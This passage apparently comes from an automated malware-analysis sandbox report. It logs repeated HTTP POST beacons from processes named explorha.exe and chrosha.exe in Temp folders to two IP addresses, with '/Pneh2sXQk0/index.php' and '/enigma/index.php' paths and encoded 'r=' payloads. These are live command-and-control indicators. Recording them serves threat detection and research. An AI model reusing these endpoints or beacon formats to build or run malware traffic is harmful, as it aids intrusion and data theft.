                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                      Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                      Data Ascii: 7 <c><d>0


                                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                      161192.168.2.550000193.233.132.56804484C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe
                                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                      Apr 19, 2024 03:30:38.871501923 CEST312OUTPOST /Pneh2sXQk0/index.php HTTP/1.1
                                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                      Host: 193.233.132.56
                                                                                                                                                                                                                                      Content-Length: 156
                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                      Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 43 32 33 38 43 41 39 46 30 42 45 32 35 41 42 41 35 46 39 45 36 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 37 46 30 41 46 34 33 43 46 46 39 46 44 33 33 43 32 30 44 42 46 42 30 30 36 31 36 35 42 37 30 33 31 38 42 42 43 30 30 36 35 43 30 44 35 41 39 35 39 36 37 44 46 34 41 30 36 30 33 33 32
                                                                                                                                                                                                                                      Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20ADC238CA9F0BE25ABA5F9E64578B4B5647A288E7F81008DA96AE6C7F0AF43CFF9FD33C20DBFB006165B70318BBC0065C0D5A95967DF4A060332
                                                                                                                                                                                                                                      Apr 19, 2024 03:30:39.132621050 CEST196INHTTP/1.1 200 OK
                                                                                                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                      Date: Fri, 19 Apr 2024 01:30:39 GMT
                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                      Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                      Data Ascii: 7 <c><d>0


                                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                      162192.168.2.550001193.233.132.56804484C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe
                                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                      Apr 19, 2024 03:30:39.488617897 CEST158OUTPOST /Pneh2sXQk0/index.php HTTP/1.1
                                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                      Host: 193.233.132.56
                                                                                                                                                                                                                                      Content-Length: 4
                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                      Data Raw: 73 74 3d 73
                                                                                                                                                                                                                                      Data Ascii: st=s
                                                                                                                                                                                                                                      Apr 19, 2024 03:30:39.728652000 CEST219INHTTP/1.1 200 OK
                                                                                                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                      Date: Fri, 19 Apr 2024 01:30:39 GMT
                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                      Refresh: 0; url = Login.php
                                                                                                                                                                                                                                      Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                      Data Ascii: 1 0


                                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                      163192.168.2.550002193.233.132.167808024C:\Users\user\AppData\Local\Temp\4d0ab15804\chrosha.exe
                                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                      Apr 19, 2024 03:30:39.709104061 CEST155OUTPOST /enigma/index.php HTTP/1.1
                                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                      Host: 193.233.132.167
                                                                                                                                                                                                                                      Content-Length: 4
                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                      Data Raw: 73 74 3d 73
                                                                                                                                                                                                                                      Data Ascii: st=s
                                                                                                                                                                                                                                      Apr 19, 2024 03:30:39.953923941 CEST197INHTTP/1.1 200 OK
                                                                                                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                      Date: Fri, 19 Apr 2024 01:30:39 GMT
                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                      Data Raw: 38 0d 0a 20 3c 63 3e 33 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                      Data Ascii: 8 <c>3<d>0
                                                                                                                                                                                                                                      Apr 19, 2024 03:30:39.957781076 CEST309OUTPOST /enigma/index.php HTTP/1.1
                                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                      Host: 193.233.132.167
                                                                                                                                                                                                                                      Content-Length: 156
                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                      Data Raw: 72 3d 39 36 33 38 44 33 34 31 35 46 37 37 38 41 31 45 33 31 46 46 43 31 46 34 42 46 39 31 33 32 42 42 39 45 36 32 35 34 45 32 41 44 36 32 37 42 35 30 44 37 39 42 46 30 34 30 30 43 42 42 32 42 42 38 31 32 37 38 35 30 39 43 30 35 42 45 41 33 36 36 39 41 35 32 37 37 37 46 41 36 31 33 35 34 35 37 33 46 46 34 45 36 34 31 32 41 37 34 36 35 41 31 46 46 34 39 30 30 42 32 44 45 46 33 43 30 41 30 41 41 39 42 43 32 32 43 38 44 31 35 39 32 34 35 35 45 37 42 35 38 30 39 41 44
                                                                                                                                                                                                                                      Data Ascii: r=9638D3415F778A1E31FFC1F4BF9132BB9E6254E2AD627B50D79BF0400CBB2BB81278509C05BEA3669A52777FA61354573FF4E6412A7465A1FF4900B2DEF3C0A0AA9BC22C8D1592455E7B5809AD
                                                                                                                                                                                                                                      Apr 19, 2024 03:30:40.207191944 CEST196INHTTP/1.1 200 OK
                                                                                                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                      Date: Fri, 19 Apr 2024 01:30:40 GMT
                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                      Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                      Data Ascii: 7 <c><d>0


                                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                      164192.168.2.550003193.233.132.56804484C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe
                                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                      Apr 19, 2024 03:30:39.982269049 CEST312OUTPOST /Pneh2sXQk0/index.php HTTP/1.1
                                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                      Host: 193.233.132.56
                                                                                                                                                                                                                                      Content-Length: 156
                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                      Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 43 32 33 38 43 41 39 46 30 42 45 32 35 41 42 41 35 46 39 45 36 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 37 46 30 41 46 34 33 43 46 46 39 46 44 33 33 43 32 30 44 42 46 42 30 30 36 31 36 35 42 37 30 33 31 38 42 42 43 30 30 36 35 43 30 44 35 41 39 35 39 36 37 44 46 34 41 30 36 30 33 33 32
                                                                                                                                                                                                                                      Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20ADC238CA9F0BE25ABA5F9E64578B4B5647A288E7F81008DA96AE6C7F0AF43CFF9FD33C20DBFB006165B70318BBC0065C0D5A95967DF4A060332
                                                                                                                                                                                                                                      Apr 19, 2024 03:30:40.237508059 CEST196INHTTP/1.1 200 OK
                                                                                                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                      Date: Fri, 19 Apr 2024 01:30:40 GMT
                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                      Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                      Data Ascii: 7 <c><d>0


                                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                      165192.168.2.550004193.233.132.167808024C:\Users\user\AppData\Local\Temp\4d0ab15804\chrosha.exe
                                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                      Apr 19, 2024 03:30:40.573239088 CEST155OUTPOST /enigma/index.php HTTP/1.1
                                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                      Host: 193.233.132.167
                                                                                                                                                                                                                                      Content-Length: 4
                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                      Data Raw: 73 74 3d 73
                                                                                                                                                                                                                                      Data Ascii: st=s
                                                                                                                                                                                                                                      Apr 19, 2024 03:30:40.823082924 CEST197INHTTP/1.1 200 OK
                                                                                                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                      Date: Fri, 19 Apr 2024 01:30:40 GMT
                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                      Data Raw: 38 0d 0a 20 3c 63 3e 33 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                      Data Ascii: 8 <c>3<d>0
                                                                                                                                                                                                                                      Apr 19, 2024 03:30:40.825916052 CEST309OUTPOST /enigma/index.php HTTP/1.1
                                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                      Host: 193.233.132.167
                                                                                                                                                                                                                                      Content-Length: 156
                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                      Data Raw: 72 3d 39 36 33 38 44 33 34 31 35 46 37 37 38 41 31 45 33 31 46 46 43 31 46 34 42 46 39 31 33 32 42 42 39 45 36 32 35 34 45 32 41 44 36 32 37 42 35 30 44 37 39 42 46 30 34 30 30 43 42 42 32 42 42 38 31 32 37 38 35 30 39 43 30 35 42 45 41 33 36 36 39 41 35 32 37 37 37 46 41 36 31 33 35 34 35 37 33 46 46 34 45 36 34 31 32 41 37 34 36 35 41 31 46 46 34 39 30 30 42 32 44 45 46 33 43 30 41 30 41 41 39 42 43 32 32 43 38 44 31 35 39 32 34 35 35 45 37 42 35 38 30 39 41 44
                                                                                                                                                                                                                                      Data Ascii: r=9638D3415F778A1E31FFC1F4BF9132BB9E6254E2AD627B50D79BF0400CBB2BB81278509C05BEA3669A52777FA61354573FF4E6412A7465A1FF4900B2DEF3C0A0AA9BC22C8D1592455E7B5809AD
                                                                                                                                                                                                                                      Apr 19, 2024 03:30:41.078823090 CEST196INHTTP/1.1 200 OK
                                                                                                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                      Date: Fri, 19 Apr 2024 01:30:40 GMT
                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                      Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                      Data Ascii: 7 <c><d>0


                                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                      166192.168.2.550005193.233.132.56804484C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe
                                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                      Apr 19, 2024 03:30:40.602494001 CEST158OUTPOST /Pneh2sXQk0/index.php HTTP/1.1
                                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                      Host: 193.233.132.56
                                                                                                                                                                                                                                      Content-Length: 4
                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                      Data Raw: 73 74 3d 73
                                                                                                                                                                                                                                      Data Ascii: st=s
                                                                                                                                                                                                                                      Apr 19, 2024 03:30:40.851536989 CEST219INHTTP/1.1 200 OK
                                                                                                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                      Date: Fri, 19 Apr 2024 01:30:40 GMT
                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                      Refresh: 0; url = Login.php
                                                                                                                                                                                                                                      Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                      Data Ascii: 1 0


                                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                      167192.168.2.550006193.233.132.56804484C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe
                                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                      Apr 19, 2024 03:30:41.100123882 CEST312OUTPOST /Pneh2sXQk0/index.php HTTP/1.1
                                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                      Host: 193.233.132.56
                                                                                                                                                                                                                                      Content-Length: 156
                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                      Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 43 32 33 38 43 41 39 46 30 42 45 32 35 41 42 41 35 46 39 45 36 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 37 46 30 41 46 34 33 43 46 46 39 46 44 33 33 43 32 30 44 42 46 42 30 30 36 31 36 35 42 37 30 33 31 38 42 42 43 30 30 36 35 43 30 44 35 41 39 35 39 36 37 44 46 34 41 30 36 30 33 33 32
                                                                                                                                                                                                                                      Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20ADC238CA9F0BE25ABA5F9E64578B4B5647A288E7F81008DA96AE6C7F0AF43CFF9FD33C20DBFB006165B70318BBC0065C0D5A95967DF4A060332
                                                                                                                                                                                                                                      Apr 19, 2024 03:30:41.349332094 CEST196INHTTP/1.1 200 OK
                                                                                                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                      Date: Fri, 19 Apr 2024 01:30:41 GMT
                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                      Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                      Data Ascii: 7 <c><d>0


                                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                      168192.168.2.550007193.233.132.167808024C:\Users\user\AppData\Local\Temp\4d0ab15804\chrosha.exe
                                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                      Apr 19, 2024 03:30:41.437313080 CEST155OUTPOST /enigma/index.php HTTP/1.1
                                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                      Host: 193.233.132.167
                                                                                                                                                                                                                                      Content-Length: 4
                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                      Data Raw: 73 74 3d 73
                                                                                                                                                                                                                                      Data Ascii: st=s
                                                                                                                                                                                                                                      Apr 19, 2024 03:30:41.689469099 CEST197INHTTP/1.1 200 OK
                                                                                                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                      Date: Fri, 19 Apr 2024 01:30:41 GMT
                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                      Data Raw: 38 0d 0a 20 3c 63 3e 33 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                      Data Ascii: 8 <c>3<d>0
                                                                                                                                                                                                                                      Apr 19, 2024 03:30:41.690449953 CEST309OUTPOST /enigma/index.php HTTP/1.1
                                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                      Host: 193.233.132.167
                                                                                                                                                                                                                                      Content-Length: 156
                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                      Data Raw: 72 3d 39 36 33 38 44 33 34 31 35 46 37 37 38 41 31 45 33 31 46 46 43 31 46 34 42 46 39 31 33 32 42 42 39 45 36 32 35 34 45 32 41 44 36 32 37 42 35 30 44 37 39 42 46 30 34 30 30 43 42 42 32 42 42 38 31 32 37 38 35 30 39 43 30 35 42 45 41 33 36 36 39 41 35 32 37 37 37 46 41 36 31 33 35 34 35 37 33 46 46 34 45 36 34 31 32 41 37 34 36 35 41 31 46 46 34 39 30 30 42 32 44 45 46 33 43 30 41 30 41 41 39 42 43 32 32 43 38 44 31 35 39 32 34 35 35 45 37 42 35 38 30 39 41 44
                                                                                                                                                                                                                                      Data Ascii: r=9638D3415F778A1E31FFC1F4BF9132BB9E6254E2AD627B50D79BF0400CBB2BB81278509C05BEA3669A52777FA61354573FF4E6412A7465A1FF4900B2DEF3C0A0AA9BC22C8D1592455E7B5809AD
                                                                                                                                                                                                                                      Apr 19, 2024 03:30:41.948496103 CEST196INHTTP/1.1 200 OK
                                                                                                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                      Date: Fri, 19 Apr 2024 01:30:41 GMT
                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                      Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                      Data Ascii: 7 <c><d>0


                                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                      169192.168.2.550008193.233.132.56804484C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe
                                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                      Apr 19, 2024 03:30:41.714231014 CEST158OUTPOST /Pneh2sXQk0/index.php HTTP/1.1
                                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                      Host: 193.233.132.56
                                                                                                                                                                                                                                      Content-Length: 4
                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                      Data Raw: 73 74 3d 73
                                                                                                                                                                                                                                      Data Ascii: st=s
                                                                                                                                                                                                                                      Apr 19, 2024 03:30:41.961945057 CEST219INHTTP/1.1 200 OK
                                                                                                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                      Date: Fri, 19 Apr 2024 01:30:41 GMT
                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                      Refresh: 0; url = Login.php
                                                                                                                                                                                                                                      Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                      Data Ascii: 1 0


                                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                      170192.168.2.550009193.233.132.56804484C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe
                                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                      Apr 19, 2024 03:30:42.217045069 CEST312OUTPOST /Pneh2sXQk0/index.php HTTP/1.1
                                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                      Host: 193.233.132.56
                                                                                                                                                                                                                                      Content-Length: 156
                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                      Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 43 32 33 38 43 41 39 46 30 42 45 32 35 41 42 41 35 46 39 45 36 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 37 46 30 41 46 34 33 43 46 46 39 46 44 33 33 43 32 30 44 42 46 42 30 30 36 31 36 35 42 37 30 33 31 38 42 42 43 30 30 36 35 43 30 44 35 41 39 35 39 36 37 44 46 34 41 30 36 30 33 33 32
                                                                                                                                                                                                                                      Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20ADC238CA9F0BE25ABA5F9E64578B4B5647A288E7F81008DA96AE6C7F0AF43CFF9FD33C20DBFB006165B70318BBC0065C0D5A95967DF4A060332
                                                                                                                                                                                                                                      Apr 19, 2024 03:30:42.466587067 CEST196INHTTP/1.1 200 OK
                                                                                                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                      Date: Fri, 19 Apr 2024 01:30:42 GMT
                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                      Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                      Data Ascii: 7 <c><d>0


                                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                      171192.168.2.550010193.233.132.167808024C:\Users\user\AppData\Local\Temp\4d0ab15804\chrosha.exe
                                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                      Apr 19, 2024 03:30:42.301182032 CEST155OUTPOST /enigma/index.php HTTP/1.1
                                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                      Host: 193.233.132.167
                                                                                                                                                                                                                                      Content-Length: 4
                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                      Data Raw: 73 74 3d 73
                                                                                                                                                                                                                                      Data Ascii: st=s
                                                                                                                                                                                                                                      Apr 19, 2024 03:30:42.547590017 CEST197INHTTP/1.1 200 OK
                                                                                                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                      Date: Fri, 19 Apr 2024 01:30:42 GMT
                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                      Data Raw: 38 0d 0a 20 3c 63 3e 33 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                      Data Ascii: 8 <c>3<d>0
                                                                                                                                                                                                                                      Apr 19, 2024 03:30:42.551604033 CEST309OUTPOST /enigma/index.php HTTP/1.1
                                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                      Host: 193.233.132.167
                                                                                                                                                                                                                                      Content-Length: 156
                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                      Data Raw: 72 3d 39 36 33 38 44 33 34 31 35 46 37 37 38 41 31 45 33 31 46 46 43 31 46 34 42 46 39 31 33 32 42 42 39 45 36 32 35 34 45 32 41 44 36 32 37 42 35 30 44 37 39 42 46 30 34 30 30 43 42 42 32 42 42 38 31 32 37 38 35 30 39 43 30 35 42 45 41 33 36 36 39 41 35 32 37 37 37 46 41 36 31 33 35 34 35 37 33 46 46 34 45 36 34 31 32 41 37 34 36 35 41 31 46 46 34 39 30 30 42 32 44 45 46 33 43 30 41 30 41 41 39 42 43 32 32 43 38 44 31 35 39 32 34 35 35 45 37 42 35 38 30 39 41 44
                                                                                                                                                                                                                                      Data Ascii: r=9638D3415F778A1E31FFC1F4BF9132BB9E6254E2AD627B50D79BF0400CBB2BB81278509C05BEA3669A52777FA61354573FF4E6412A7465A1FF4900B2DEF3C0A0AA9BC22C8D1592455E7B5809AD
                                                                                                                                                                                                                                      Apr 19, 2024 03:30:42.804879904 CEST196INHTTP/1.1 200 OK
                                                                                                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                      Date: Fri, 19 Apr 2024 01:30:42 GMT
                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                      Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                      Data Ascii: 7 <c><d>0


                                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                      172192.168.2.550011193.233.132.56804484C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe
                                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                      Apr 19, 2024 03:30:42.828185081 CEST158OUTPOST /Pneh2sXQk0/index.php HTTP/1.1
                                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                      Host: 193.233.132.56
                                                                                                                                                                                                                                      Content-Length: 4
                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                      Data Raw: 73 74 3d 73
                                                                                                                                                                                                                                      Data Ascii: st=s
                                                                                                                                                                                                                                      Apr 19, 2024 03:30:43.076931953 CEST219INHTTP/1.1 200 OK
                                                                                                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                      Date: Fri, 19 Apr 2024 01:30:42 GMT
                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                      Refresh: 0; url = Login.php
                                                                                                                                                                                                                                      Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                      Data Ascii: 1 0


                                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                      173192.168.2.550012193.233.132.167808024C:\Users\user\AppData\Local\Temp\4d0ab15804\chrosha.exe
                                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                      Apr 19, 2024 03:30:43.184144020 CEST155OUTPOST /enigma/index.php HTTP/1.1
                                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                      Host: 193.233.132.167
                                                                                                                                                                                                                                      Content-Length: 4
                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                      Data Raw: 73 74 3d 73
                                                                                                                                                                                                                                      Data Ascii: st=s
                                                                                                                                                                                                                                      Apr 19, 2024 03:30:43.436554909 CEST197INHTTP/1.1 200 OK
                                                                                                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                      Date: Fri, 19 Apr 2024 01:30:43 GMT
                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                      Data Raw: 38 0d 0a 20 3c 63 3e 33 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                      Data Ascii: 8 <c>3<d>0
                                                                                                                                                                                                                                      Apr 19, 2024 03:30:43.439369917 CEST309OUTPOST /enigma/index.php HTTP/1.1
                                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                      Host: 193.233.132.167
                                                                                                                                                                                                                                      Content-Length: 156
                                                                                                                                                                                                                                      Cache-Control: no-cache
